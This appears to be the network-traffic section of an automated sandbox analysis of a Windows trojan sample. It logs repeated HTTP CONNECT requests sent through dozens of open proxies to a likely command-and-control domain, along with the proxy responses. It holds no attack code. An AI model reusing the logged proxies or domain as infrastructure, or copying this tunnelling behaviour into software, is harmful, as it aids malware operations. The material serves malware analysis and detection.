                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                211192.168.2.85086982.113.157.122312805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.573057890 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                212192.168.2.850047184.181.217.22041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.573976040 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                213192.168.2.850906172.67.181.58805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.582587004 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.670515060 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                214192.168.2.85087272.210.208.10141455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.583708048 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                215192.168.2.850728222.220.102.15980005828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.596843958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:33.696584940 CET59INHTTP/1.1 200 Connection Established
                                                                                Proxy-agent: nginx
                                                                                Feb 23, 2024 14:28:34.697932005 CET59INHTTP/1.1 200 Connection Established
                                                                                Proxy-agent: nginx


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                216192.168.2.850868193.239.58.9280815828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.603022099 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                217192.168.2.850924104.22.14.48805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.609276056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.697400093 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                218192.168.2.85007750.63.12.3323859
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.610853910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.694859028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.788712025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.882584095 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.882545948 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                219192.168.2.849954221.6.139.19090025828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.613542080 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.694885015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.035588980 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                                                                                Feb 23, 2024 14:28:30.054280043 CET311INHTTP/1.1 400 Bad Request
                                                                                Server: nginx
                                                                                Date: Fri, 23 Feb 2024 13:28:26 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 166
                                                                                Connection: close
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                220192.168.2.850875185.38.111.180805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.623213053 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Feb 23, 2024 14:28:23.811079025 CET75INHTTP/1.1 200 OK
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Length: 0
                                                                                Feb 23, 2024 14:28:23.998545885 CET103INHTTP/1.1 400 Bad Request
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                Connection: close
                                                                                Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                Data Ascii: 400 Bad Request


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                221192.168.2.850769217.199.151.94825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.626458883 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.397852898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.683187008 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.991858006 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:32.585612059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:37.192265987 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:43.460830927 CET19INHTTP/1.1 200 OK


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                222192.168.2.850834175.183.82.221805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.632647991 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.956079960 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                223192.168.2.850184152.32.238.63380805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.635343075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                224192.168.2.85086043.153.133.208156735828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.636477947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                225192.168.2.850787171.244.140.160538825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.638809919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.397866964 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:25.683094978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.991841078 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                226192.168.2.85090298.188.47.13241455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.649770021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                227192.168.2.850901104.200.152.3041455828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.659276962 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                228192.168.2.850956172.67.3.98805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.662714958 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.749859095 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                229192.168.2.85020154.39.50.68446125828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.663743973 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.694895029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.695771933 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.695132971 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                230192.168.2.850852101.231.64.8984435828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.664597988 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                231192.168.2.850014115.171.217.4878905828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.671506882 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.976284981 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                232192.168.2.850969162.159.242.10805828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.681566954 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.769587994 CET316INHTTP/1.1 400 Bad Request
                                                                                Server: cloudflare
                                                                                Date: Fri, 23 Feb 2024 13:28:23 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 155
                                                                                Connection: close
                                                                                CF-RAY: -
                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                233192.168.2.850212138.197.92.110359825828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.681735039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.694901943 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:29.788707972 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:35.882550955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:47.882536888 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:59.882219076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:29:11.897847891 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                234192.168.2.850971167.172.159.43329885828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.682029009 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:23.991594076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.304168940 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.991775990 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:26.195476055 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:27.499207020 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:28.847564936 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:31.381633997 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                235192.168.2.850863168.138.21.25031285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.689753056 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:36.888339996 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                236192.168.2.850821125.87.90.21680895828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.690109015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive
                                                                                Feb 23, 2024 14:28:24.400650024 CET39INHTTP/1.1 200 Connection established


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                237192.168.2.84974079.132.192.1331285828C:\Users\user\Desktop\SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Feb 23, 2024 14:28:23.690198898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                Host: heygirlisheeverythingyouwantedinaman.com
                                                                                Proxy-Connection: Keep-Alive


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
